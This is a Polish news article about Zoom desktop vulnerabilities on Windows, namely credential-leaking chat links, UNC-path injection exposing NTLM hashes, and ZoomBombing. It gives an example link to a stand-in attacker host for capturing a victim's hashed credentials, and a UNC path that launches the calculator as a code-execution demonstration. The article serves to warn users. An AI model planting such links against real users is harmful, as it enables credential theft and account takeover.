Przechodząca okres dużej popularności aplikacja Zoom okazuje się bardziej dziurawa, niż myślano. Wykryto kolejne exploity, zagrażające prywatności użytkowników.

Eksperci zajmujący się cyberbezpieczeństwem ostrzegają, że osoby korzystające z desktopowej wersji aplikacji Zoom mogą otrzymać złośliwy link, który umożliwi przestępcom wykradzenie hasła do e-maila. Jest to możliwe dzięki luce w oprogramowaniu. Kliknięcie w link przesłany poprzez czat programu pozwala osobie wysyłające na podejrzenie haseł do poczty oraz udostępnienie możliwości wejścia do skrzynki odbiorczej Microsoft Outlook oraz dokumentów Sharepoint zapisanych na dysku. Jest to o tyle groźne, że z Zoom korzystają firmy, jak i władze - na poniższym zdjęciu widzisz premiera Wielkiej Brytanii, Borisa Johnsona, komunikującego się za pośrednictwem tej aplikacji z wysokimi urzędnikami w administracji państwowej. Łatwo się domyślić, że dostanie się przez włamywaczy do skrzynki pocztowej lub dokumentów premiera jest bardzo poważnym zagrożeniem.

Ale to nie wszystko. Zalecane jest także zwrócenie szczególnej uwagi na przesyłane poprzez Zoom linki, rozpoczynające się od \\. Na przykład rozmówca prześle taki linki:

\\attacker.computer.com\company_salary.xlsx

Jeśli klikniesz w niego, będzie mógł podejrzeć nazwę użytkownika systemu, nazwę domeny lub komputera, a także zaszyfrowane hasła. Hasła te można odtworzyć, zyskując w ten sposób dostęp do zainstalowanych na tym komputerze aplikacji Microsoft Exchange, Outlooka oraz Sharepoint. Ponadto w niektórych sytuacjach włamywacz może doprowadzić do zdalnego wykonania kodu, a co gorsze - przejąć i ponownie użyć tokenów umożliwiających dostęp do zasobów sieciowych. Matthew Hickey z zajmującej się cyberbezpieczeństwem firmy Hacker House, przetestował różnego rodzaju ataki na desktopową wersję Zoom. Wykrył wówczas m.in. wysokie ryzyko wykorzystania w aplikacji Universal Naming Convention (UNC, konwencja zapisu ścieżki do udziału sieciowego) w celu wykorzystania Uniform Resource Identifier do wstrzyknięcia złośliwego kodu lub wykorzystania do podejrzenia haseł dostępu niektórych mechanizmów systemu, np. NT Lan Manager. Na szczęście w tym ostatnim przypadku nowsze wersje systemów Windows są w stanie wykryć zagrożenie i ostrzec użytkownika przed próbą ich użycia, jednak samej kradzieży nie odnotują.

Jednym z przykładów zdalnego użycia kodu jest przesłanie linka aktywującego systemowy kalkulator:

\\127.0.0.1\C\Windows\System32\Calc.exe

Po wklejeniu linku do wyszukiwarki zobaczysz:

Hickey podkreśla, że luki te występują tylko w wydaniu aplikacji na Windows. Efektem luk może być także wymuszone zapraszanie użytkowników do udziału w wideokonferencji - wyobraźmy sobie sytuację, w której podczas spotkania online zarządu firmy dołącza do niego nikomu nieznana osoba. Ryzyko tego może zostać zmniejszone przez stosowanie w sieciach firmowych filtrów blokujących dla portów wychodzących, które mogą być użyte w celu wykorzystania ataku. W edycjach dla użytkowników prywatnych tej funkcji nie ma. Większość domowych połączeń z internetem wymaga udostępnienia takich portów, co z kolei umożliwia wykorzystanie UNC.

FBI prowadzi śledztwo w sprawia ataków nazwanych ZoomBombing - nazwa ta obejmuje wykorzystywanie luk programu do wykradania adresów e-mail, zdjęć oraz dołączania do wideokonferencji. Zoom obiecuje jak najszybsze załatanie luk.

